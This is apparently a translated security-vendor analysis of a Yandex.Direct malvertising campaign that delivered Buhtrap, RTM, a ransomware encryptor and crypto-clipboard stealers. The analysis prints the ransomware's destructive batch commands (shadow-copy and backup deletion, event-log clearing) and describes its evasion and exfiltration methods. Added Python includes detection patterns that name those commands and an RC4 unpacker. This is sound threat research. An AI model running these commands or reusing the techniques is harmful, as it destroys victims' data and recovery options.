Buhtrap backdoor and encryptor distributed via Yandex.Direct

To target accountants in a cyber attack, you can use the documents they search for online. This is what a cyber group has been doing over the past few months, distributing the known backdoors Buhtrap and RTM, as well as encryptors and cryptocurrency-stealing software. Most of the targets are in Russia. The attack was carried out by placing malicious advertising on Yandex.Direct. Potential victims were directed to a website that asked them to download a malicious file disguised as a document template. Yandex removed the malicious advertising after our warning.

The Buhtrap source code was leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed the malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to victims share a single distribution mechanism. All the malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which was changed frequently. Since GitHub lets you view a repository's change history, we can see which malware was distributed at a given time. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the screenshot above, was used.

The design of the site and all the malicious file names follow a single theme: forms, templates, contracts, samples and so on. The approach in the new campaign is the same. The only question is how the victim reached the attackers' website.

Infection

At least several of the victims who ended up on this site were lured by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites; all of them had the same campaign id (blanki_rsya), and most related to accounting or legal assistance services. The URL shows that the potential victim used the search query "download invoice form", which supports our hypothesis of targeted attacks. Below are the sites on which the banners appeared and the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • contract sample - IPopen[.]ru
  • complaint application sample - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-prodazhi[.]ru
  • court petition sample - zen.yandex[.]ru
  • complaint sample - yurday[.]ru
  • sample contract forms - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment contract sample - napravah[.]com
  • legal contract samples - avito[.]ru

The blanki-shabloni24[.]ru site may have been designed to pass a cursory visual inspection. Typically, ads that point to a professional-looking site with a link to GitHub do not look obviously malicious. In addition, the attackers placed the malicious files in the repository only for a short period, probably during a campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. Thus, the attackers were able to distribute ads through Yandex.Direct on sites that were likely visited by accountants arriving in response to specific search queries.

Next, let's look at the various payloads distributed in this way.

Payload analysis

Distribution timeline

The malicious activity began at the end of October 2018 and was ongoing at the time of writing. Since the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was detected, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we were missing part of the change history, because the repository was removed from GitHub before we could retrieve it in full.

Figure 1. Malware distribution timeline.

Code signing certificates

The campaign used several certificates. Some were used to sign multiple malware families, which further indicates that the different samples belonged to a single campaign. Despite having the private key, the operators did not systematically sign their binaries and did not use the key for all samples. At the end of February 2019, the attackers began creating invalid signatures using a Google certificate for which they did not have the private key.

All the certificates involved in the campaign, and the malware families they were used to sign, are listed in the table below.

(Table: code signing certificates used in the campaign and the malware families they signed; shown as an image in the original.)

We also used these certificates to look for links to other malware families. For most of the certificates, we found no samples that were not distributed via the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, adware and miners. It is unlikely that this malware is related to the campaign. Most likely, the certificate was purchased on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was distributed mainly in February-March 2019. It behaves as ransomware should: it searches local drives and network folders and encrypts the files it finds. It does not need an internet connection to compromise a machine, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to terminate key software that may hold open handles to files with valuable information, which could interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make recovery difficult. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap uses the legitimate online service IP Logger, which is designed to collect information about website visitors. Here it is used to track the ransomware's victims, which is the job of the following command line:

mshta.exe "javascript:document.write('');"
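As an added defensive example (not code from the ESET analysis), the following Python scans constructed Sysmon-style process-creation lines for the anti-recovery commands in the batch script above and for the mshta beacon; the event line format, rule names and the three-technique threshold are my assumptions.

```python
import re
from typing import Dict, List, Tuple

# Rules for the anti-recovery batch script and the mshta beacon shown above.
# Each regex is matched case-insensitively against the CommandLine field of a
# process-creation event (Sysmon Event ID 1 style; the line format is assumed).
RULES: List[Tuple[str, str]] = [
    ("boot recovery disabled",
     r"bcdedit\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("backup catalog deleted",
     r"wbadmin\b.*\bdelete\s+(catalog|systemstatebackup|backup)\b"),
    ("shadow copies deleted",
     r"(vssadmin\b.*\bdelete\s+shadows|wmic\b.*\bshadowcopy\s+delete)"),
    ("RDP history wiped",
     r"(reg\s+delete\b.*terminal server client|\bdel\b.*default\.rdp)"),
    ("event logs cleared",
     r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b"),
    ("event log service disabled",
     r"\bsc\b.*\bconfig\s+eventlog\s+start\s*=\s*disabled"),
    ("mshta javascript beacon", r"mshta(\.exe)?\b.*javascript:"),
]

def command_line(event: str) -> str:
    """Extract the CommandLine field from a 'Key: value ...' event line."""
    m = re.search(r"CommandLine:\s*(.*)$", event)
    return m.group(1).strip() if m else ""

def match_rules(cmd: str) -> List[str]:
    """Names of every rule the command line triggers."""
    return [name for name, pat in RULES if re.search(pat, cmd, re.IGNORECASE)]

def scan(events: List[str]) -> Dict[str, List[str]]:
    """Map each triggered rule to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        cmd = command_line(ev)
        for name in match_rules(cmd):
            hits.setdefault(name, []).append(cmd)
    return hits

def verdict(hits: Dict[str, List[str]]) -> str:
    """Several distinct techniques in one burst is the pre-encryption pattern."""
    if len(hits) >= 3:
        return "ransomware-preparation"
    return "suspicious" if hits else "clean"

# Constructed sample events, not real telemetry; the last one is benign.
SAMPLE_EVENTS = [
    r'EventID: 1 Image: C:\Windows\System32\bcdedit.exe CommandLine: bcdedit /set {default} recoveryenabled no',
    r'EventID: 1 Image: C:\Windows\System32\wbadmin.exe CommandLine: wbadmin delete catalog -quiet',
    r'EventID: 1 Image: C:\Windows\System32\vssadmin.exe CommandLine: vssadmin delete shadows /all /quiet',
    r'EventID: 1 Image: C:\Windows\System32\reg.exe CommandLine: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f',
    r'EventID: 1 Image: C:\Windows\System32\wevtutil.exe CommandLine: wevtutil.exe clear-log Security',
    r'EventID: 1 Image: C:\Windows\System32\sc.exe CommandLine: sc config eventlog start=disabled',
    r'''EventID: 1 Image: C:\Windows\System32\mshta.exe CommandLine: mshta.exe "javascript:document.write('');"''',
    r'EventID: 1 Image: C:\Windows\System32\vssadmin.exe CommandLine: vssadmin list shadows',
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    print(verdict(found), sorted(found))
```

Any single rule can fire on legitimate administration, which is why the verdict keys on several distinct techniques inside one burst rather than on one command.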

Files are selected for encryption if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings in the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the file name of the ransom note. The list is given below. Obviously, all of this is intended to keep the machine bootable, but with very limited usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

When executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-packed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation process.

Below is an example of the plaintext with a generated private key, which is the token attached to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is the hard-coded 2048-bit RSA key (public exponent e and modulus n) mentioned above.


Files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file, a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

(Figure: encrypted file header layout; shown as an image in the original.)

The source file data, with the magic value VEGA appended, is encrypted up to the first 0x5000 bytes. All the information needed for decryption is appended to the file with the following structure:

(Figure: structure of the decryption information appended to the file; shown as an image in the original.)

- The file size marker contains a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from the end of October to the beginning of December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Having detected a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask its behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period when the malware was being distributed, only small amounts of BTC were sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this malware, and the description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

Buhtrap loader

For some time, a loader was available on GitHub that did not resemble previous Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to retrieve the next stage and loads it directly into memory. We can distinguish two behaviours of the second-stage code. In the first, the RSS.php URL delivered the Buhtrap backdoor directly; this backdoor is very similar to the one that has been available since the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor that are allegedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behaviour was that the RSS.php URL was passed to another loader. It implemented some obfuscation, such as rebuilding the import table. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed this loader executing was the Buhtrap backdoor, but there could be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for only one day, November 1, 2018. Apart from being hosted on GitHub, ESET telemetry finds no evidence of this malware being distributed.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR inside the APK. It is encrypted with RC4 using the following key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field.
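An added analyst helper, not from the article or from the Anubis sample: it implements RC4 with the key listed above and unpacks the length-prefixed container described in this paragraph. The little-endian byte order of the length field and the constructed sample archive are assumptions.

```python
import io
import zipfile

# RC4 key listed above for the Android component's encrypted JAR.
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); the same call decrypts the obfuscated strings."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def unpack_jar(container: bytes, key: bytes = KEY, byteorder: str = "little") -> bytes:
    """Parse the 'image/files' blob: 4-byte length, then RC4(JAR) of that length.

    The article does not give the byte order of the length field; little-endian
    is an assumption, so it is a parameter rather than a constant.
    """
    if len(container) < 4:
        raise ValueError("container shorter than the 4-byte length field")
    length = int.from_bytes(container[:4], byteorder)
    if length == 0 or 4 + length > len(container):
        raise ValueError(f"length {length} inconsistent with {len(container)} bytes")
    jar = rc4(key, container[4:4 + length])
    if jar[:2] != b"PK":
        raise ValueError("no ZIP signature after decryption: wrong key or byte order?")
    return jar

def jar_entries(jar: bytes) -> list:
    """Member names of the decrypted JAR (a JAR is an ordinary ZIP archive)."""
    with zipfile.ZipFile(io.BytesIO(jar)) as zf:
        return zf.namelist()

def build_sample(key: bytes = KEY, byteorder: str = "little") -> bytes:
    """Constructed stand-in for the real blob (not taken from the APK)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"constructed placeholder, not a real dex file")
        zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    jar = buf.getvalue()
    return len(jar).to_bytes(4, byteorder) + rc4(key, jar)

if __name__ == "__main__":
    print(jar_entries(unpack_jar(build_sample())))
```

On a real sample, pass the bytes of image/files to unpack_jar and, if the ZIP signature check fails, retry with byteorder="big" before suspecting the key.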

After decrypting the file, we found that it was Anubis, a previously documented banker for Android. The malware has the following capabilities:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogging
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker used Twitter as a communication channel to obtain another C&C server. The sample we analysed used the @JonesTrader account, but at the time of analysis it had already been blocked.

The banker has a list of target applications on Android devices. It is longer than the list found in the Sophos research. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component works on the clipboard. It targets a wide range of cryptocurrencies, as well as Steam trade offers. In addition, it uses the IP Logger service to steal Bitcoin private keys in WIF format.

Protection mechanisms

In addition to the benefits ConfuserEx provides in preventing debugging, dumping and tampering, the component includes detection of antivirus products and virtual machines.

To check that it is running on a real machine, the malware uses the Windows WMI command line (WMIC) to query BIOS information, namely:

wmic bios

The program then parses the output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After decoding from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Antivirus product detection process.

In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The malware version we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, adding the path to updater.exe. This way, the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses; when one is found, it replaces it with one of the operator's addresses. Below is the list of targeted address types, according to what is found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam trade system, as can be seen from the regular expression used to match it in the clipboard buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Exfiltration method

In addition to replacing addresses in the clipboard, the malware looks for WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as an exfiltration channel for the WIF private keys. To do this, the operators place the private keys in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably used a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, another exfiltration server was stored in the environment variable DiscordWebHook. Surprisingly, this environment variable is not set anywhere in the code. This suggests that the malware is still under development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value in the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which the handler for this URL is called DevFeedbackUrl. Based on the environment variable name, we believe the operators are planning to use the legitimate Discord service and its webhook mechanism to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyber attacks. The scheme targets Russian organizations, but we would not be surprised to see such an attack using non-Russian services as well. To avoid compromise, users should verify the reputation of the source of the software they download.

The full list of indicators of compromise and MITRE ATT&CK attributes is available at the link.

Source: www.habr.com
